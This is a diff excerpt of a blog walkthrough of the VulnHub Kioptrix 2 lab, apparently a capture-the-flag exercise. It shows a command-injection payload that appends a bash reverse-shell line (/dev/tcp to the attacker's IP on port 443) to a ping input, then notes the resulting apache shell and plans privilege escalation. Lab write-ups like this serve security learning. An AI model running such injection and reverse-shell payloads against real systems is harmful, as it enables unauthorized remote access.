unni-krishnan-95/copy/_posts/2016-12-30-vulnhub-kioptrix2.md

 127.0.0.1; bash -i >& /dev/tcp/192.168.1.3/443 0>&1
 ```

-This will basically initiate a reverse TCP connection using bash.
+This will basically initiate a reverse TCP connection using bash to the IP address of your machine (192.168.1.3 in my case), on port 443.

 <a href="/images/kiop2-5.png"><img src="/images/kiop2-5.png"></a>

 Perfect!
-We were able to connect to the victim’s machine, and it seems we are currently running as the account __apache__.
-Our next step would be to carry out some [Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) to be able to get access to the root account.
+We were able to connect to the victim’s machine, and it seems that we are currently running as the __apache__ account.
+Our next step from here would be to carry out some [Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) to be able to get access to the root account.

 Let's start by seeing what version of Linux the system is running.